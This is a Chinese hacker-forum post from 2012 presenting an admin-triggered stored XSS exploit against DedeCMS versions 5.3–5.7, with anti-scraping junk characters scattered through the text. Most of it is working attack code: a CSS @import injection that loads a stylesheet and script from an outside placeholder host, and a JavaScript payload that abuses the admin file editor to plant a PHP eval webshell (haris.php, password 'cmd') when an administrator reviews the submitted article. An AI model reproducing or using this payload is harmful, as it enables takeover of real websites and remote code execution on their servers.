找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1883|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell/ s0 e* \# q( S) z$ U# j
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
0 ]: ?! G7 t" L0 b) l; j目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。& @* a; a, t  ~; q! {
下面说说利用方法。' S' m' i; [+ V% z
条件有2个:
; q2 _' S* [7 O) L; u1 x1.开启注册
8 F# M5 L+ K1 B7 D2.开启投稿
/ f$ c3 R1 M& x6 _6 s) L注册会员----发表文章9 I# P" P9 G7 W8 V7 h
内容填写:
" B% `" T! k, J  s# P7 C复制代码
& Y. K' `, `. |& J, f<style>@im\port'\http://xxx.com/xss.css';</style>
9 Y, w: U, J8 J新建XSS.Css: X/ c' w1 w: }0 N! f& }3 K7 E
复制代码& {6 E# D6 o; T+ H4 P$ k2 F9 u
.body{
+ C5 ?" b1 U. N+ H$ G' f6 d+ L6 y/ _1 rbackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }  p; H) r" N! p  D
新建xss.js 内容为' w  q, d+ d- v0 `  l
复制代码
$ @' ~' J" u0 o; L1.var request = false;1 V/ {( W9 L. r
2.if(window.XMLHttpRequest) {
5 x; v5 v, K$ }5 A7 v3.request = new XMLHttpRequest();
: t0 `( R5 S7 k# w7 s3 f4 ^  u+ `4.if(request.overrideMimeType) {
( z( o  ^3 Z0 c' T: Y$ w5.request.overrideMimeType('text/xml');* B# A/ N. h, H2 U6 H- P8 y
6.}* n. t( c. C8 P5 Q, B  h. z
7.} else if(window.ActiveXObject) {
" _. b) f* @! n1 C# O8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];. n8 ^. c) |5 W& x
9.for(var i=0; i<versions.length; i++) {9 v$ p4 |- C. Z3 x$ g( a: Q7 ]# S
10.try {
5 e( s+ C" U6 x7 Z+ [+ g11.request = new ActiveXObject(versions);0 f% R% M* r1 Y2 ^6 U+ s
12.} catch(e) {}# ]: c3 Q! u3 |, o
13.}( T  e/ ?2 r% \( Y; f
14.}
  P$ i: _5 P) s" ^. x. ]15.xmlhttp=request;& ?% r! `( X3 A+ W: N1 l* N
16.function getFolder( url ){6 }: Q; S3 g/ N# B# {) w$ J
17. obj = url.split('/'); N7 e8 ?. A* E2 t/ b# i; W" Z& k
18. return obj[obj.length-2]
/ Z6 U$ x  @; b  V0 g' ], g. F19.}/ l# g) r4 C3 W! N# v6 X
20.oUrl = top.location.href;
, a/ l! z& v; m  j  `1 K: J0 o21.u = getFolder(oUrl);
: k) g# k$ u6 e22.add_admin();% J6 X' |$ G* L* @
23.function add_admin(){
# ]; V7 S! a( _# ~24.var url= "/"+u+"/sys_sql_query.php";$ E! h$ b; p: y- ]& Z8 q' K. x
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";6 Q9 E' n" N7 F
26.xmlhttp.open("POST", url, true);
0 H/ ^9 u3 `" r* }0 h! ^* b+ v27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  N8 X0 G& F; ]* ^! P! ~8 c! U28.xmlhttp.setRequestHeader("Content-length", params.length);
& i  E/ Q6 X: W0 u: [  E29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
# k6 O1 R7 K" C; |# `' h' o0 B30.xmlhttp.send(params);
& x' u) [3 S5 k: M31.}
, m+ k+ G* n% i/ i. l+ d, B当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表